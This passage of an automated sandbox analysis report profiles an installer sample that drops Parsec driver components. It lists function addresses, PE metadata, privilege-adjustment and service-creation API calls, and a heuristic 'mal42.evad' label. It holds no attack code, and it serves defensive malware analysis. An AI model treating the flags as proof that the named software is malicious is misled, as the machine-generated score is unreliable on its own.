Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C4036049_2_00007FF763C40360
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C2F26049_2_00007FF763C2F260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3E29449_2_00007FF763C3E294
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C0322049_2_00007FF763C03220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5A24C49_2_00007FF763C5A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C501C849_2_00007FF763C501C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C491B849_2_00007FF763C491B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C4213049_2_00007FF763C42130
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C488F049_2_00007FF763C488F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3E8B049_2_00007FF763C3E8B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C248D049_2_00007FF763C248D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5386049_2_00007FF763C53860
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C2179049_2_00007FF763C21790
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C4D6AC49_2_00007FF763C4D6AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3E6A449_2_00007FF763C3E6A4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5065C49_2_00007FF763C5065C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C535E449_2_00007FF763C535E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5A24C49_2_00007FF763C5A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3F5C849_2_00007FF763C3F5C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C4956449_2_00007FF763C49564
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C4E54449_2_00007FF763C4E544
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C50CDC49_2_00007FF763C50CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C51C7049_2_00007FF763C51C70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C02BF049_2_00007FF763C02BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C2DB7049_2_00007FF763C2DB70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3EAB449_2_00007FF763C3EAB4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C2EAA049_2_00007FF763C2EAA0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C04A8049_2_00007FF763C04A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C21A8049_2_00007FF763C21A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C239B049_2_00007FF763C239B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C469B849_2_00007FF763C469B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5C95C49_2_00007FF763C5C95C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C0706049_2_00007FF763C07060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3E09049_2_00007FF763C3E090
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C20FE049_2_00007FF763C20FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3FF5C49_2_00007FF763C3FF5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C58EE449_2_00007FF763C58EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C57E1C49_2_00007FF763C57E1C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5FDF449_2_00007FF763C5FDF4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C18DD049_2_00007FF763C18DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C49D5C49_2_00007FF763C49D5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5DD9449_2_00007FF763C5DD94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B8474052_2_00007FF694B84740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BCF77052_2_00007FF694BCF770
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B968B052_2_00007FF694B968B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B8319052_2_00007FF694B83190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B814B052_2_00007FF694B814B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B88DD052_2_00007FF694B88DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB196052_2_00007FF694BB1960
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC2CE452_2_00007FF694BC2CE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC85E452_2_00007FF694BC85E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB958952_2_00007FF694BB9589
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BCA72C52_2_00007FF694BCA72C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B9179052_2_00007FF694B91790
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BAF78C52_2_00007FF694BAF78C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BAD8C052_2_00007FF694BAD8C0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B948D052_2_00007FF694B948D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BBF8C852_2_00007FF694BBF8C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B7322052_2_00007FF694B73220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB61E852_2_00007FF694BB61E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B9E19052_2_00007FF694B9E190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BAE2E452_2_00007FF694BAE2E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B9D26052_2_00007FF694B9D260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC03DC52_2_00007FF694BC03DC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B743A052_2_00007FF694B743A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC137052_2_00007FF694BC1370
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC751C52_2_00007FF694BC751C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B7C4D052_2_00007FF694B7C4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BAEDF852_2_00007FF694BAEDF8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B74DD052_2_00007FF694B74DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB8D9452_2_00007FF694BB8D94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BBFD5C52_2_00007FF694BBFD5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BBCD7052_2_00007FF694BBCD70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BADED452_2_00007FF694BADED4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B90FE052_2_00007FF694B90FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BC2F6052_2_00007FF694BC2F60
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB812052_2_00007FF694BB8120
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BCF0D452_2_00007FF694BCF0D4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BAE0E052_2_00007FF694BAE0E0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B7706052_2_00007FF694B77060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BCD07452_2_00007FF694BCD074
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB89E852_2_00007FF694BB89E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B939B052_2_00007FF694B939B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BADAC452_2_00007FF694BADAC4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B91A8052_2_00007FF694B91A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B74A8052_2_00007FF694B74A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B72BF052_2_00007FF694B72BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BAFB9052_2_00007FF694BAFB90
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BADCD052_2_00007FF694BADCD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BB5CDC52_2_00007FF694BB5CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BBDC4052_2_00007FF694BBDC40
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694BCBC3C52_2_00007FF694BCBC3C
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_0040755C66_2_0040755C
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_00406D8566_2_00406D85
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C68B072_2_00007FF6750C68B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750B474072_2_00007FF6750B4740
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FF77072_2_00007FF6750FF770
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750B319072_2_00007FF6750B3190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750B14B072_2_00007FF6750B14B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750AC4D072_2_00007FF6750AC4D0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750B8DD072_2_00007FF6750B8DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E196072_2_00007FF6750E1960
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F2CE472_2_00007FF6750F2CE4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FA72C72_2_00007FF6750FA72C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E958972_2_00007FF6750E9589
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F85E472_2_00007FF6750F85E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C48D072_2_00007FF6750C48D0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750EF8C872_2_00007FF6750EF8C8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DD8C072_2_00007FF6750DD8C0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C179072_2_00007FF6750C1790
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DF78C72_2_00007FF6750DF78C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750CD26072_2_00007FF6750CD260
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DE2E472_2_00007FF6750DE2E4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750CE19072_2_00007FF6750CE190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E61E872_2_00007FF6750E61E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A322072_2_00007FF6750A3220
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F751C72_2_00007FF6750F751C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F137072_2_00007FF6750F1370
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A43A072_2_00007FF6750A43A0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F03DC72_2_00007FF6750F03DC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DDED472_2_00007FF6750DDED4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750ECD7072_2_00007FF6750ECD70
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750EFD5C72_2_00007FF6750EFD5C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E8D9472_2_00007FF6750E8D94
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A4DD072_2_00007FF6750A4DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DEDF872_2_00007FF6750DEDF8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FD07472_2_00007FF6750FD074
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A706072_2_00007FF6750A7060
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FF0D472_2_00007FF6750FF0D4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DE0E072_2_00007FF6750DE0E0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E812072_2_00007FF6750E8120
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750F2F6072_2_00007FF6750F2F60
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C0FE072_2_00007FF6750C0FE0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C1A8072_2_00007FF6750C1A80
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A4A8072_2_00007FF6750A4A80
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DDAC472_2_00007FF6750DDAC4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C39B072_2_00007FF6750C39B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E89E872_2_00007FF6750E89E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750EDC4072_2_00007FF6750EDC40
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750FBC3C72_2_00007FF6750FBC3C
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DDCD072_2_00007FF6750DDCD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750E5CDC72_2_00007FF6750E5CDC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750DFB9072_2_00007FF6750DFB90
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750A2BF072_2_00007FF6750A2BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeProcess token adjusted: Load Driver
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: String function: 00007FF6750A8380 appears 52 times
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: String function: 00007FF6750A97D0 appears 99 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: String function: 00007FF763C097D0 appears 142 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: String function: 00007FF763C08380 appears 52 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: String function: 00007FF763C1EAE0 appears 53 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: String function: 00007FF694B78380 appears 52 times
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: String function: 00007FF694B797D0 appears 99 times
Source: uu8v4UUzTU.exeStatic PE information: invalid certificate
Source: uu8v4UUzTU.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-61CCU.tmp.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: is-DQG3S.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-PBFIO.tmp.1.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: is-86N5H.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-6EGJL.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-JRFAI.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-QSA3H.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-BUN5H.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-HCV6V.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-8G60N.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-1CLR0.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-PSU9B.tmp.1.drStatic PE information: No import functions for PE file found
Source: is-P56QD.tmp.1.drStatic PE information: No import functions for PE file found
Source: uu8v4UUzTU.exe, 00000000.00000000.1715763878.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002649000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FE15000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exe, 00000000.00000003.2155250071.00000000022C8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exeBinary or memory string: OriginalFileName vs uu8v4UUzTU.exe
Source: uu8v4UUzTU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: parsecvusba.sys.46.drBinary string: \Device\USBFDO-%ws%d
Source: classification engineClassification label: mal42.evad.winEXE@125/200@3/2
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C24560 GetLastError,FormatMessageA,LocalFree,49_2_00007FF763C24560
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00426830 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,5_2_00426830
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0041BD0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_0041BD0C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,46_2_0040352D
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C248D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,49_2_00007FF763C248D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 52_2_00007FF694B948D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,52_2_00007FF694B948D0
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,66_2_0040352D
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 72_2_00007FF6750C48D0 GetCurrentProcess,OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetFileSecurityW,InitializeSecurityDescriptor,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,SetFileSecurityW,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,SetSecurityDescriptorOwner,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,72_2_00007FF6750C48D0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0041BC48 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,5_2_0041BC48
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,49_2_00007FF763C24400
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,52_2_00007FF694B94400
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,72_2_00007FF6750C4400
